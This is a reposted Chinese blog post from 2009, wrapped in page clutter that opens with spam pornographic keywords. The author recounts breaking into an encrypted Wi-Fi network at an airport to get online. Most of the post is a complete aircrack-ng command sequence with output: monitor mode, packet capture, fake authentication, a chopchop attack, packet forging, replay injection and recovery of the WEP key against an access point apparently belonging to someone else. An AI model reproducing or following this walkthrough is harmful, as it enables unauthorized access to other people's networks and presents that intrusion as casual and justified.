国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP

首頁

好書

留言交流

下載APP

聯(lián)系客服
使用Ubuntu進(jìn)行無線破解過程

使用Ubuntu進(jìn)行無線破解過程

Apr 16th, 2009

轉(zhuǎn)載本站文章請(qǐng)注明,轉(zhuǎn)載自:扶凱[http://www.php-oa.com]

本文鏈接: http://www.php-oa.com/2009/04/16/ubuntu-airmon-ng.html

前幾天在接女朋友,在機(jī)場(chǎng)接女朋友,因?yàn)橛卸€(gè)小時(shí),自己坐在機(jī)場(chǎng)蠻無聊的,就想拿電腦上網(wǎng),但發(fā)現(xiàn),基本都是加密的,沒有可以用的.所以沒法子,只有強(qiáng)行來硬的啦.整個(gè)過程一共花了20分鐘

我的環(huán)境是Ubuntu9.04.用的筆記本是IBM X200 無線網(wǎng)卡是Intel(R) WiFi Link 5100 AGN.在linux下面做這些真是太方便了.以下為整個(gè)無線破解的過程.

 

開啟wlan為監(jiān)聽模式

fukai@fukai-laptop:~$ sudo airmon-ng start wlan0

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID    Name
3316    NetworkManager
3335    wpa_supplicant
3340    avahi-daemon
3341    avahi-daemon

Interface    Chipset        Driver

mon0        Unknown     iwlagn – [phy0]
                (monitor mode enabled on mon0

開始抓包(這個(gè)終端不要關(guān)掉)
 

fukai@fukai-laptop:~$sudo airodump-ng -w chop.cap --ivs --channel 11 mon0

 CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][ 2009-04-13 22:17         
                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                              
 00:02:2D:B4:31:01  -55   0       10        0    0   1  11   OPN              C
 00:02:2D:B4:5D:8D  -51 100    10723      199    0  11  11   OPN              C
 00:02:2D:B4:30:F6  -72  96    10393      206    0  11  11   OPN              C
 00:0F:B5:79:DD:DD  -76  93     8306    24444    0  11  54 . WEP  WEP    OPN  U
 00:02:2D:B4:30:F2  -82   2     1463       46    0   6  11   OPN              C
 00:02:2D:B4:5D:78  -74   0        5        0    0   1  11   OPN              C
 00:02:2D:B4:31:5A  -76   0        6        0    0   1  11   OPN              C
 00:0D:97:04:90:49  -76   0        0        1    0   1  54 . WPA2 CCMP   PSK  S
 00:02:2D:B4:5D:64  -80   0        8        0    0   1  11   OPN              C
                                                                              
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes    
00:0F:B5:79:DD:DD  00:21:5D:90:E9:0A    0    1 - 0      0   129203    
00:02:2D:B4:30:F2  00:16:EA:E1:57:44  -87    2 - 1      0       22             
(not associated)     00:1C:B3:1C:BA:D0  -72    0 - 1      0       17            
^C

 

進(jìn)行FakeAuth攻擊(我原來的x60到這步就死機(jī))

fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:DD:DD -h 00:21:5d:90:e9:0a mon0

 

    注:-h為主機(jī)MAC地址 -a為需要破解的無線AP的地址

21:59:31  Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
21:59:31  Sending Authentication Request (Open System) [ACK]
21:59:31  Authentication successful
21:59:31  Sending Association Request [ACK]
21:59:31  Association successful

(AID: 1)

 

進(jìn)行Chopchop攻擊

 

fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b  00:0F:B5:79:DD:DD -h 00:21:5d:90:e9:0a mon0

22:00:05  Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
Read 2507 packets…

        Size: 86, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:0F:B5:79:DD:DD
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0F:B5:79:DD:DD

        0×0000:  0842 0000 ffff ffff ffff 000f b579 0498  .B………..y..
        0×0010:  000f b579 0498 005a 6772 0400 6e0c 067f  …y…Zgr..n..
        0×0020:  7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab  |…..1.&…^P..
        0×0030:  3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83  :..V….ob}..N..
        0×0040:  fca4 5e17 703f f414 828d bd8c 8d21 a2bc  ..^.p?…….!..
        0×0050:  8767 f385 61cc                           .g..a.

Use this packet ? y

Saving chosen packet in replay_src-0413-220115.cap

Offset   85 ( 0% done) | xor = F9 | pt = 35 |   92 frames written in  1569ms
Offset   84 ( 1% done) | xor = 82 | pt = E3 |   33 frames written in   561ms
Offset   83 ( 3% done) | xor = 63 | pt = E6 |  141 frames written in  2404ms
Offset   82 ( 5% done) | xor = 77 | pt = 84 |  198 frames written in  3373ms
Offset   81 ( 7% done) | xor = 67 | pt = 00 |   69 frames written in  1166ms
Offset   80 ( 9% done) | xor = 87 | pt = 00 |    3 frames written in    50ms
Offset   79 (11% done) | xor = BC | pt = 00 |  461 frames written in  7840ms
Offset   78 (13% done) | xor = A2 | pt = 00 |  452 frames written in  7665ms
Offset   77 (15% done) | xor = 21 | pt = 00 |  156 frames written in  2660ms
Offset   76 (17% done) | xor = 8D | pt = 00 |  256 frames written in  4360ms
Offset   75 (19% done) | xor = 8C | pt = 00 |   31 frames written in   519ms
Offset   74 (21% done) | xor = BD | pt = 00 |   12 frames written in   211ms
Offset   73 (23% done) | xor = 8D | pt = 00 |  681 frames written in 11572ms
Offset   72 (25% done) | xor = 82 | pt = 00 |  231 frames written in  3936ms
Offset   71 (26% done) | xor = 14 | pt = 00 |  126 frames written in  2148ms
Offset   70 (28% done) | xor = F4 | pt = 00 |  359 frames written in  6085ms
Offset   69 (30% done) | xor = 3F | pt = 00 |  143 frames written in  2443ms
Offset   68 (32% done) | xor = 70 | pt = 00 |  253 frames written in  4307ms
Offset   67 (34% done) | xor = 17 | pt = 00 |   70 frames written in  1182ms
Offset   66 (36% done) | xor = 5E | pt = 00 |  100 frames written in  1691ms
Offset   65 (38% done) | xor = A4 | pt = 00 |  164 frames written in  2779ms
Offset   64 (40% done) | xor = FC | pt = 00 | 1101 frames written in 18689ms
Offset   63 (42% done) | xor = E6 | pt = 65 | 1054 frames written in 17906ms
Offset   62 (44% done) | xor = 9D | pt = 00 |  226 frames written in  3819ms
Offset   61 (46% done) | xor = E6 | pt = A8 |  181 frames written in  3076ms
Offset   60 (48% done) | xor = 09 | pt = C0 |   16 frames written in   271ms
Offset   59 (50% done) | xor = 0B | pt = 00 |   55 frames written in   939ms
Offset   58 (51% done) | xor = 7D | pt = 00 |   71 frames written in  1197ms
Offset   57 (53% done) | xor = 62 | pt = 00 |  228 frames written in  3860ms
Offset   56 (55% done) | xor = 6F | pt = 00 |  331 frames written in  5626ms
Offset   55 (57% done) | xor = F0 | pt = 00 |  198 frames written in  3354ms
Offset   54 (59% done) | xor = 14 | pt = 00 |   64 frames written in  1089ms
Offset   53 (61% done) | xor = A3 | pt = 01 |  246 frames written in  4174ms
Offset   52 (63% done) | xor = FC | pt = 00 |  754 frames written in 12819ms
Offset   51 (65% done) | xor = FE | pt = A8 |  102 frames written in  1721ms
Offset   50 (67% done) | xor = DB | pt = C0 |   42 frames written in   721ms
Offset   49 (69% done) | xor = 87 | pt = 98 |   97 frames written in  1645ms
Offset   48 (71% done) | xor = 3E | pt = 04 |   47 frames written in   797ms
Offset   47 (73% done) | xor = D2 | pt = 79 |   63 frames written in  1064ms
Offset   46 (75% done) | xor = 51 | pt = B5 |  252 frames written in  4252ms
Offset   45 (76% done) | xor = 5F | pt = 0F |  108 frames written in  1828ms
Offset   44 (78% done) | xor = 5E | pt = 00 |  241 frames written in  4074ms
Offset   43 (80% done) | xor = F2 | pt = 01 |  193 frames written in  3257ms
Offset   42 (82% done) | xor = 03 | pt = 00 | 1126 frames written in 19048ms
Offset   41 (84% done) | xor = 18 | pt = 04 |  420 frames written in  7191ms
Offset   40 (86% done) | xor = 20 | pt = 06 |  586 frames written in  9941ms
Offset   39 (88% done) | xor = F1 | pt = 00 |  394 frames written in  6683ms
Offset   38 (90% done) | xor = 39 | pt = 08 |  228 frames written in  3868ms
Offset   37 (92% done) | xor = 13 | pt = 01 | 1015 frames written in 17194ms
Offset   36 (94% done) | xor = FF | pt = 00 |  282 frames written in  4801ms
Offset   35 (96% done) | xor = F8 | pt = 06 | 1830 frames written in 31105ms
Sent 2386 packets, current guess: 48…

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor

Completed in 303s (0.16 bytes/s)

 

使用tcpdump查看生成的CAP文件內(nèi)容

 

fukai@fukai-laptop:~$ tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap

reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff:ff BSSID:00:0F:B5:79:DD:DD SA:00:0F:B5:79:DD:DD LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa) Command, ctrl 0×03: oui Ethernet (0×000000), ethertype ARP (0×0806): arp who-has 192.168.0.101 tell 192.168.0.1

 

構(gòu)造注入包

 

root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h 00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0204-000647.xor -w fvck.cap

Wrote packet  to: fvck.cap

同時(shí)進(jìn)行Interactive Attack攻擊

 

fukai@fukai-laptop:~$ sudo packetforge-ng  -0 -a 00:0F:B5:79:DD:DD -h 00:21:5d:90:e9:0a -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0413-220624.xor  -w fvck.cap

Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:0F:B5:79:DD:DD
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:21:5D:90:E9:0A

        0×0000:  0841 0201 000f b579 0498 0021 5d90 e90a  .A…..y…!]…
        0×0010:  ffff ffff ffff 8001 6772 0400 6e0c 067f  ……..gr..n..
        0×0020:  7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42  |…..1.&…^~.B
        0×0030:  d78d 2401 035c 14f0 6f62 7d0b f619 6219  ..$..\..ob}…b.
        0×0040:  e060 df45                                .`.E

Use this packet ? y

Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.

End of file.

破解

 

fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs

  Aircrack-ng 1.0 rc3

                 [00:00:02] Tested 296 keys (got 15985 IVs)

   KB    depth   byte(vote)
    0    5/  6   01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
    1    3/  5   0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
    2    0/  2   45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
    3    0/  1   67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
    4    4/  5   89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)

                         KEY FOUND! [ 01:23:45:67:89 ]
    Decrypted correctly: 100%

本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
ubo-header、signature、chunk結(jié)構(gòu)
正在虧損不要急,“四面來財(cái)”拯救你,讓你虧損轉(zhuǎn)盈利(附公式)
用delphi控制小票打印機(jī)打印圖片
dd5000aff18ff27e4f3 607×370 像素
備忘錄文檔_202211090316
智能壓力變送器PT20MS
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服